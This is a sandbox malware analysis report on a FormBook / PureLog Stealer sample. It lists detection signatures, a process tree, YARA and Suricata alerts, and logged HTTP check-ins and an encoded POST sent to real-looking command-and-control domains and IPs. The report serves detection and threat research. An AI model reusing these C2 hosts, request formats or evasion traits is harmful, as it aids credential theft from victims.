Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QsBdpe1gK5.exe

Overview

General Information

Sample name:QsBdpe1gK5.exe
renamed because original name is a hash value
Original sample name:2b7153bd3b38f85441844e5b9eb277b441357b5725adf4505e8631f6d34d0606.exe
Analysis ID:1589101
MD5:4bc2f58c4ac26d5d012f166d263d3b72
SHA1:91d3241e1edf478dae9ba4d2731079d70f8100b7
SHA256:2b7153bd3b38f85441844e5b9eb277b441357b5725adf4505e8631f6d34d0606
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • QsBdpe1gK5.exe (PID: 7252 cmdline: "C:\Users\user\Desktop\QsBdpe1gK5.exe" MD5: 4BC2F58C4AC26D5D012F166D263D3B72)
    • QsBdpe1gK5.exe (PID: 7400 cmdline: "C:\Users\user\Desktop\QsBdpe1gK5.exe" MD5: 4BC2F58C4AC26D5D012F166D263D3B72)
      • oPkpFmCiYVL.exe (PID: 5016 cmdline: "C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • find.exe (PID: 7556 cmdline: "C:\Windows\SysWOW64\find.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • oPkpFmCiYVL.exe (PID: 4588 cmdline: "C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7880 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.1841761840.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.4126273747.0000000002BB0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000008.00000002.4129375797.0000000005340000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000004.00000002.4126207300.0000000002B60000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000000.00000002.1698119849.00000000041B9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            Click to see the 7 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.QsBdpe1gK5.exe.41d24c8.2.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.QsBdpe1gK5.exe.7c40000.5.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.QsBdpe1gK5.exe.7c40000.5.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  2.2.QsBdpe1gK5.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                    0.2.QsBdpe1gK5.exe.41d24c8.2.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      Click to see the 2 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-11T09:36:21.767422+010020507451Malware Command and Control Activity Detected192.168.2.44974115.197.142.17380TCP
                      2025-01-11T09:36:45.094735+010020507451Malware Command and Control Activity Detected192.168.2.449745104.21.80.180TCP
                      2025-01-11T09:37:06.343691+010020507451Malware Command and Control Activity Detected192.168.2.44980313.248.169.4880TCP
                      2025-01-11T09:37:19.665181+010020507451Malware Command and Control Activity Detected192.168.2.449937173.0.157.18780TCP
                      2025-01-11T09:37:49.081500+010020507451Malware Command and Control Activity Detected192.168.2.45002413.248.169.4880TCP
                      2025-01-11T09:38:03.309833+010020507451Malware Command and Control Activity Detected192.168.2.45002838.47.233.480TCP
                      2025-01-11T09:38:16.641140+010020507451Malware Command and Control Activity Detected192.168.2.450032199.192.23.12380TCP
                      2025-01-11T09:38:29.971877+010020507451Malware Command and Control Activity Detected192.168.2.450036104.21.36.23980TCP
                      2025-01-11T09:38:44.008084+010020507451Malware Command and Control Activity Detected192.168.2.450040208.91.197.2780TCP
                      2025-01-11T09:38:58.165890+010020507451Malware Command and Control Activity Detected192.168.2.45004413.248.169.4880TCP
                      2025-01-11T09:39:11.812195+010020507451Malware Command and Control Activity Detected192.168.2.45004854.67.42.14580TCP
                      2025-01-11T09:39:25.214471+010020507451Malware Command and Control Activity Detected192.168.2.450052193.180.209.1580TCP
                      2025-01-11T09:39:39.185113+010020507451Malware Command and Control Activity Detected192.168.2.450056208.91.197.2780TCP
                      2025-01-11T09:39:52.587233+010020507451Malware Command and Control Activity Detected192.168.2.450060104.21.88.13980TCP
                      2025-01-11T09:40:01.576894+010020507451Malware Command and Control Activity Detected192.168.2.45006115.197.142.17380TCP
                      2025-01-11T09:40:14.834725+010020507451Malware Command and Control Activity Detected192.168.2.450065104.21.80.180TCP
                      2025-01-11T09:40:27.958740+010020507451Malware Command and Control Activity Detected192.168.2.45006913.248.169.4880TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Multi AV Scanner detection for submitted file
                      Source: QsBdpe1gK5.exeVirustotal: Detection: 80%Perma Link
                      Source: QsBdpe1gK5.exeReversingLabs: Detection: 87%
                      Yara detected FormBook
                      Source: Yara matchFile source: 2.2.QsBdpe1gK5.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.QsBdpe1gK5.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.1841761840.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.4126273747.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4129375797.0000000005340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.4126207300.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1849388475.0000000001460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1850179249.0000000001570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for sample
                      Source: QsBdpe1gK5.exeJoe Sandbox ML: detected
                      Source: QsBdpe1gK5.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: QsBdpe1gK5.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: dAwj.pdbSHA256 source: find.exe, 00000004.00000002.4128433138.00000000036AC000.00000004.10000000.00040000.00000000.sdmp, oPkpFmCiYVL.exe, 00000008.00000002.4127340747.0000000002F0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2142201848.000000000C92C000.00000004.80000000.00040000.00000000.sdmp, QsBdpe1gK5.exe
                      Source: Binary string: find.pdb source: QsBdpe1gK5.exe, 00000002.00000002.1842189389.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, oPkpFmCiYVL.exe, 00000003.00000002.4126594257.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oPkpFmCiYVL.exe, 00000003.00000000.1767735711.0000000000B8E000.00000002.00000001.01000000.0000000C.sdmp, oPkpFmCiYVL.exe, 00000008.00000002.4126367984.0000000000B8E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: QsBdpe1gK5.exe, 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000004.00000003.1850711530.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000004.00000003.1841756637.0000000002D06000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: QsBdpe1gK5.exe, QsBdpe1gK5.exe, 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, find.exe, find.exe, 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000004.00000003.1850711530.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000004.00000003.1841756637.0000000002D06000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: find.pdbGCTL source: QsBdpe1gK5.exe, 00000002.00000002.1842189389.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, oPkpFmCiYVL.exe, 00000003.00000002.4126594257.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: dAwj.pdb source: find.exe, 00000004.00000002.4128433138.00000000036AC000.00000004.10000000.00040000.00000000.sdmp, oPkpFmCiYVL.exe, 00000008.00000002.4127340747.0000000002F0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2142201848.000000000C92C000.00000004.80000000.00040000.00000000.sdmp, QsBdpe1gK5.exe
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_008BC7D0 FindFirstFileW,FindNextFileW,FindClose,4_2_008BC7D0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4x nop then xor eax, eax4_2_008A9E70
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4x nop then mov ebx, 00000004h4_2_02FA04D8

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49741 -> 15.197.142.173:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49803 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49745 -> 104.21.80.1:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49937 -> 173.0.157.187:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50024 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50036 -> 104.21.36.239:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50040 -> 208.91.197.27:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50032 -> 199.192.23.123:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50052 -> 193.180.209.15:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50060 -> 104.21.88.139:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50056 -> 208.91.197.27:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50028 -> 38.47.233.4:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50044 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50048 -> 54.67.42.145:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50065 -> 104.21.80.1:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50061 -> 15.197.142.173:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50069 -> 13.248.169.48:80
                      Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                      Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
                      Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                      Source: Joe Sandbox ViewASN Name: ERI-ASUS ERI-ASUS
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /zxe0/?sTS=El+NSyicP5BK/60Db2Xg1o31Ym1kL1m1F+D0aleaH+wp2K9lM+jEhQu4F5Y51N1X01h2I0uJ1YrEHciK2w5TkDzccLdwJ4YQfOICjey7dRE9nJA6OdtOGEU=&fd=Cr_TAhTpvZaLf HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.dojodigitize.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /vfw3/?sTS=rqg4sojPN1HzbyOnDHJ3Cr7oIHIM290cauZgTy6bg/7NgADr7OmLN934TwPzSFzjuedcHscZgYNpl4RBVJqUXd9S1SYp7SdNfp3f2O4BoE1UQty0MmYBNPM=&fd=Cr_TAhTpvZaLf HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.masterqq.proConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /ve8l/?fd=Cr_TAhTpvZaLf&sTS=2CD4NCzEaM98tRHxByL6CBkb+r1SrLrNZhOfTEabPOsm5z4GKvQfPi2Ic9iPSKmuH0LkAH7bJGGmIcrctbsX23D3J9NSlYassghIEyGyoqU/M/j1A+InoJ8= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.hasan.cloudConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /5m3m/?sTS=sewIB7u3B3NHgPpecNRVGRfHaR4xptSr2ssF1/N7S59PV2pKHs5HlxSNSrXn1+DkcB7Gvkqs+bGSNPZzMS9ekzKmes/Xrk63tnUiEwK+oMVFTyGd1xnpI1E=&fd=Cr_TAhTpvZaLf HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.0be.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /r99d/?sTS=ksK/jUMQwoE3w4qDzm/qv01bg55PF/RmojthsfhnWNNbCeiLSUgY3hP8WR6lQk2TH0Mmbs+eW9ZNK4MyNm4idscl/ZtmhgZI2+0bahWoqT3AjAY6wh2Hxmo=&fd=Cr_TAhTpvZaLf HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.ssps.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /fqrq/?sTS=Y0cHWYGzbrmggkpfvJxXUOlrVtzgTlaz5SpuxjzPWz583Z1p+HcVA7FQEFnwJzFb+2T9MdMSTUdI8uj8DHEKh+4z5Ml02qUNdUfINiCsx6tEm640t8Frn4Y=&fd=Cr_TAhTpvZaLf HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.qqc5.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /6npp/?sTS=jlm9uKJBzKMSKltpVchdAcfiLn2XLMvveDKXZTqGsHNtP0MrAi/8oe7gvYTD+ahEZPaxXoJGvNi0UKW4HyzdiVCn0xvmy+fGUin5LDmJal6tlMrzh8MM5dQ=&fd=Cr_TAhTpvZaLf HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.learnnow.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /eln6/?sTS=dR5Y3aKNW3l55kUMNVrLYxm/K9ThMGgB73Jn5o4FF8VATzcLQGkwEffEVFziLlDWg39FgTTosOgM31CCD8Gpd/kFlGTTehU6/lxZCa6BP/PSovIsDoNSFVQ=&fd=Cr_TAhTpvZaLf HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.goldbracelet.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /1y0g/?sTS=IEuRIrUs/61ernzXW8DdDQ7UXMybyf23DCiGM7fBggrgjt9jf+N1tpys90b5qRt+HznRgPSmLqw7b0RWB/MNeeBm+a+pfpebFy1eZZqf08c6FVwESRpxQuE=&fd=Cr_TAhTpvZaLf HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.regislemberthe.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /c8xp/?sTS=l2hePdG2jE2F6AlFvQqInUM+71snQK+liE9tGVtIaiFMA3WO/t2DJG5mtSw4Uv/mQsI3gW77r9LMmz2KJVksCggp8HSVbW+G3kXwep+YaDI6dKKwGN8DY44=&fd=Cr_TAhTpvZaLf HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.honk.cityConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /t3a1/?fd=Cr_TAhTpvZaLf&sTS=lPY12PoV4Qu/vhxdPmr863TaLMXXpQ43UbOQjSvNRb0mvGBHituRHrNfT9/xpia5xYCwJL1ofkUI7HJ5t37uE1B48htAcHyBpMzkQSoug0pxqUZhndEiNFY= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.gupiao.betConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /plc2/?sTS=sjJIcM7rXxnPrFloQUd7uRIIOfMaVKcO2uhZ3WrFd6iw+5UGAWLmyTv1SrcKmKBFl4Y89PiFDrVpBQFB+L6IBSCA24gjnVcGyQtTEi1HcJTxVdLPUB56JMc=&fd=Cr_TAhTpvZaLf HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.fengzheng.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /9pyp/?sTS=/jnQvNiesFQPp+Sr+qvu3BcQPRo0em6f7Q4t/avNQHldTt5geLOnsXFtMBLfdtd6me/HPN9T8yryju1POCks88Xo3NK0HfOsZ2ntIEnTG3MwtjQxG1je1c4=&fd=Cr_TAhTpvZaLf HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.joeltcarpenter.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /rm8a/?sTS=D6HNS+3OA9WxuB6ixfDf8ScOMqf60XWg1eRGn1U3pQm4dbrOXbziEv17YWBDjG9YL3PgZ6NF0eFX/SB1L/rjn2byVNbXQbqI29dbukDAFIdClQ55cQRWn7Y=&fd=Cr_TAhTpvZaLf HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.incgruporxat.clickConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /zxe0/?sTS=El+NSyicP5BK/60Db2Xg1o31Ym1kL1m1F+D0aleaH+wp2K9lM+jEhQu4F5Y51N1X01h2I0uJ1YrEHciK2w5TkDzccLdwJ4YQfOICjey7dRE9nJA6OdtOGEU=&fd=Cr_TAhTpvZaLf HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.dojodigitize.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /vfw3/?sTS=rqg4sojPN1HzbyOnDHJ3Cr7oIHIM290cauZgTy6bg/7NgADr7OmLN934TwPzSFzjuedcHscZgYNpl4RBVJqUXd9S1SYp7SdNfp3f2O4BoE1UQty0MmYBNPM=&fd=Cr_TAhTpvZaLf HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.masterqq.proConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /ve8l/?fd=Cr_TAhTpvZaLf&sTS=2CD4NCzEaM98tRHxByL6CBkb+r1SrLrNZhOfTEabPOsm5z4GKvQfPi2Ic9iPSKmuH0LkAH7bJGGmIcrctbsX23D3J9NSlYassghIEyGyoqU/M/j1A+InoJ8= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.hasan.cloudConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficDNS traffic detected: DNS query: www.dojodigitize.shop
                      Source: global trafficDNS traffic detected: DNS query: www.masterqq.pro
                      Source: global trafficDNS traffic detected: DNS query: www.hasan.cloud
                      Source: global trafficDNS traffic detected: DNS query: www.0be.info
                      Source: global trafficDNS traffic detected: DNS query: www.tageting.shop
                      Source: global trafficDNS traffic detected: DNS query: www.ulojenukw.shop
                      Source: global trafficDNS traffic detected: DNS query: www.ssps.shop
                      Source: global trafficDNS traffic detected: DNS query: www.qqc5.top
                      Source: global trafficDNS traffic detected: DNS query: www.learnnow.info
                      Source: global trafficDNS traffic detected: DNS query: www.goldbracelet.top
                      Source: global trafficDNS traffic detected: DNS query: www.regislemberthe.online
                      Source: global trafficDNS traffic detected: DNS query: www.honk.city
                      Source: global trafficDNS traffic detected: DNS query: www.gupiao.bet
                      Source: global trafficDNS traffic detected: DNS query: www.fengzheng.shop
                      Source: global trafficDNS traffic detected: DNS query: www.joeltcarpenter.online
                      Source: global trafficDNS traffic detected: DNS query: www.incgruporxat.click
                      Source: unknownHTTP traffic detected: POST /vfw3/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.masterqq.proCache-Control: no-cacheContent-Length: 200Connection: closeContent-Type: application/x-www-form-urlencodedOrigin: http://www.masterqq.proReferer: http://www.masterqq.pro/vfw3/User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)Data Raw: 73 54 53 3d 6d 6f 49 59 76 59 71 37 45 45 76 56 55 52 61 38 46 33 5a 66 5a 4a 4b 4c 54 56 49 30 37 72 41 69 57 4e 55 33 51 53 43 61 6f 76 4c 34 6a 53 47 4e 78 34 61 52 66 38 48 2b 64 44 75 6e 61 54 2f 64 67 62 56 34 61 70 34 75 67 2f 31 53 6c 2f 4e 2b 51 74 79 58 53 74 64 7a 32 6e 38 74 7a 32 31 43 5a 2b 66 77 6b 50 51 2b 74 48 51 63 47 75 44 42 41 6b 39 56 4a 39 46 4f 4a 66 39 62 6a 4c 6b 4a 